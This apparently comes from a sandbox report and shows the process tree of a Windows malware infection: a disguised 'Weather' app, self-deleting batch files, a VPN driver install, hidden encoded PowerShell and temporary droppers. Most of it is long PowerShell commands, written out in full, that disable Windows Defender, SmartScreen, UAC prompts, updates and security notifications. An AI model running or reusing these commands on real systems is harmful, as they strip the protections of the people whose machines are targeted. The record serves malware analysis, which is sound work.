"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1704,6387542773388399655,525396954848012977,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8084_1055879415" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2632 /prefetch:1
5⤵
PID:7956

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1704,6387542773388399655,525396954848012977,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8084_1055879415" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2336 /prefetch:2
5⤵
PID:6600

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1704,6387542773388399655,525396954848012977,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8084_1055879415" --mojo-platform-channel-handle=3360 /prefetch:8
5⤵
PID:4376

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1704,6387542773388399655,525396954848012977,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8084_1055879415" --mojo-platform-channel-handle=1716 /prefetch:8
5⤵
PID:7888

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXEAACA.bat" "
3⤵
PID:6404

C:\Windows\SysWOW64\attrib.exe
C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1"
4⤵
- Views/modifies file attributes
PID:5644

C:\Windows\SysWOW64\timeout.exe
C:\Windows\System32\timeout.exe 5
4⤵
- Delays execution with timeout.exe
PID:8100

C:\Windows\SysWOW64\timeout.exe
C:\Windows\System32\timeout.exe 5
4⤵
- Delays execution with timeout.exe
PID:6576

C:\Windows\SysWOW64\attrib.exe
C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXEAACA.bat"
4⤵
- Views/modifies file attributes
PID:7176

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXEAACA.bat" "
4⤵
PID:8740

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" cls"
4⤵
PID:7972

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXEAA9A.bat" "
3⤵
PID:7792

C:\Windows\SysWOW64\attrib.exe
C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1\AIPACK~1.EXE"
4⤵
- Views/modifies file attributes
PID:8208

C:\Windows\SysWOW64\timeout.exe
C:\Windows\System32\timeout.exe 5
4⤵
- Delays execution with timeout.exe
PID:7272

C:\Windows\SysWOW64\attrib.exe
C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXEAA9A.bat"
4⤵
- Views/modifies file attributes
PID:6584

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXEAA9A.bat" "
4⤵
PID:7124

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" cls"
4⤵
PID:6244

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:5820

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\f4f3f0a06d5340d98367f2aec2cb0dcb /t 0 /p 5820
1⤵
PID:6032

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5236

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
PID:3488

C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{214ea3f7-fa80-1b49-a38a-eb11c520ab7e}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
2⤵
PID:6192

C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"
2⤵
PID:6500

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:6576

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:6568

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:6812

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:6848

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:5960

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
PID:6212

C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
2⤵
PID:5284

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6684

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5232

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:2768

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\0fa00bce5d9b4a4b87112903cec1fd83 /t 0 /p 6684
1⤵
PID:7568

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7952

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7768

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5340

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\130634a52c8c490bb3a83b4344a26cd9 /t 7236 /p 5340
1⤵
PID:8508

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4864

C:\Users\Admin\AppData\Local\Temp\3674.tmp.exe
C:\Users\Admin\AppData\Local\Temp\3674.tmp.exe
1⤵
PID:9116

C:\Users\Admin\AppData\Local\Temp\51AD.tmp.exe
C:\Users\Admin\AppData\Local\Temp\51AD.tmp.exe
1⤵
PID:8260

C:\Users\Admin\AppData\Local\Temp\61DB.tmp.exe
C:\Users\Admin\AppData\Local\Temp\61DB.tmp.exe
1⤵
PID:9212

C:\Users\Admin\AppData\Local\Temp\61DB.tmp.exe
"C:\Users\Admin\AppData\Local\Temp\61DB.tmp.exe"
2⤵
PID:6752

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe" $key='HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'PreventOverride' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'EnabledV9' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\PCHealth\ErrorReporting';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'IncludeShutdownErrs' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'AllOrNone' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'IncludeMicrosoftApps' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'Disabled' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'IncludeWindowsApps' -Value 0; $key='HKLM:\SOFTWARE\Microsoft\Windows\Windows Error Reporting';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Disabled' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DontShowUI' -Value 1; $key='HKCU:\SOFTWARE\Microsoft\Windows\Windows Error Reporting';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Disabled' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DontShowUI' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Scan_ScheduleDay' -Value 8; New-ItemProperty -Path $key -Force -Verbose -Name 'LocalSettingOverrideScan_ScheduleTime' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableEnhancedNotifications' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableGenericRePorts' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableBlockAtFirstSeen' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'LocalSettingOverrideSpynetReporting' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'SpynetReporting' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'SubmitSamplesConsent' -Value 2; $key='HKLM:\software\microsoft\Security Center';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'AntiVirusDisableNotify' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'FirewallDisableNotify' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'UpdatesDisableNotify' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'UacDisableNotify' -Value 1; $key='HKLM:\software\Policies\Microsoft\MRT';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DontReportInfectionInformation' -Value 1; $key='HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose};New-ItemProperty -Path $key -Name 'DisableWindowsUpdateAccess' -Value 1 -Force -Verbose; New-ItemProperty -Path $key -Name 'SetDisableUXWUAccess' -Value 1 -Force -Verbose; New-ItemProperty -Path $key -Name 'DoNotConnectToWindowsUpdateInternetLocations' -Value 1 -Force -Verbose;New-ItemProperty -Path $key -Name 'DisableOSUpgrade' -Value 1 -Force -Verbose; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'NoAutoUpdate' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableFeaturedSoftware' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'AllowFastServiceStartup' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableAntiSpyware' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'ServiceKeepAlive' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableAntiVirus' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'PUAProtection' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'MpEnablePus' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableRealtimeMonitoring' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableBehaviorMonitoring' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableIOAVProtection' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableOnAccessProtection' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableRawWriteNotification' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableScanOnRealtimeEnable' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableBlockAtFirstSeen' -Value 1; $key='HKLM:\SOFTWARE\Microsoft\Windows Defender';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableAntiSpyware' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableAntiVirus' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\System';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableSmartScreen' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Features';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'TamperProtection' -Value 0; $key='HKLM:\SOFTWARE\Microsoft\Windows Defender';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'ProductStatus' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'ManagedDefenderProductType' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableRoutinelyTakingAction' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'OneTimeSqmDataSent' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Scan';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'ScanParameters' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'ScheduleDay' -Value 8; $key='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'TaskbarNoNotification' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'HideSCAHealth' -Value 1; $key='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'SmartScreenEnabled' -Type String -Value 'Off'; Set-ItemProperty 'HKLM:\software\microsoft\windows\currentversion\Explorer' -Force 'DisableNotificationCenter' -Value 1; Remove-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose SecurityHealth -ErrorAction SilentlyContinue;
3⤵
PID:9096

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe" Remove-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose WindowsDefender -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose 'Windows Defender' -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose MSC -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose AvastUI.exe -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose SecurityHealth -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose MSC -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose WindowsDefender -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose 'Windows Defender' -ErrorAction SilentlyContinue; Remove-ItemProperty 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Force -Verbose AvastUI.exe -ErrorAction SilentlyContinue; $key='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enabled' -Value 0; $key='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enabled' -Value 0; $key='HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Maintenance';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'MaintenanceDisabled' -Value 1; $key='HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Maintenance';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'MaintenanceDisabled' -Value 1; $key='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enabled' -Value 0; $key='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enabled' -Value 0; $key='HKLM:\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'EnabledV9' -Value 0; $key='HKCU:\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'EnabledV9' -Value 0; $key='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enabled' -Value 0; $key='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enabled' -Value 0; $key='HKLM:\software\microsoft\windows\currentversion\AppHost';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableWebContentEvaluation' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows\DataCollection';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'AllowTelemetry' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'DoNotShowFeedbackNotifications' -Value 1; $key='HKLM:\SOFTWARE\Microsoft\Personalization\Settings';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'AcceptedPrivacyPolicy' -Value 0; $key='HKLM:\SYSTEM\CurrentControlSet\Control\WMI\AutoLogger\AutoLogger-Diagtrack-Listener';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Start' -Value 0; $key='HKLM:\SOFTWARE\Microsoft\Input\TIPC';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enabled' -Value 0; $key='HKLM:\Software\Microsoft\Internet Explorer\PhishingFilter';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'EnabledV8' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'EnabledV9' -Value 0; $key='HKLM:\software\microsoft\windows\currentversion\policies\system';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableLUA' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'ConsentPromptBehaviorAdmin' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'PromptOnSecureDesktop' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableInstallerDetection' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'ConsentPromptBehaviorUser' -Value 3; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableSecureUIAPaths' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'ValidateAdminCodeSignatures' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableVirtualization' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableUIADesktopToggle' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'FilterAdministratorToken' -Value 0; $key='HKLM:\SYSTEM\CurrentControlSet\Control\WMI\AutoLogger\SQMLogger';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Start' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows\AppCompat';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'AITEnable' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'DisableUAR' -Value 1; $key='HKLM:\SOFTWARE\Microsoft\InputPersonalization';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'RestrictImplicitInkCollection' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'RestrictImplicitTextCollection' -Value 1; New-ItemProperty -Path $key -Force -Verbose -Name 'HarvestContacts' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows\TabletPC';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'PreventHandwritingDataSharing' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\Windows\HandwritingErrorReports';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'PreventHandwritingErrorReports' -Value 1; $key='HKLM:\SOFTWARE\Policies\Microsoft\SQMClient\Windows';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'CEIPEnable' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'CorporateSQMURL' -Value '0.0.0.0';
3⤵
PID:3996

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe" $key='HKLM:\SOFTWARE\Policies\Microsoft\Office\16.0\osm';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'Enablelogging' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'EnableUpload' -Value 0; $key='HKLM:\SOFTWARE\Microsoft\Siuf\Rules';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'NumberOfSIUFInPeriod' -Value 0; New-ItemProperty -Path $key -Force -Verbose -Name 'PeriodInNanoSeconds' -Value 0; $key='HKLM:\SOFTWARE\Policies\Microsoft\Assistance\Client\1.0';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'NoExplicitFeedback' -Value 1; $key='HKLM:\SOFTWARE\Microsoft\MediaPlayer\Preferences';if((Test-Path $key) -ne $TRUE){New-Item -path $key -Force -Verbose}; New-ItemProperty -Path $key -Force -Verbose -Name 'UsageTracking' 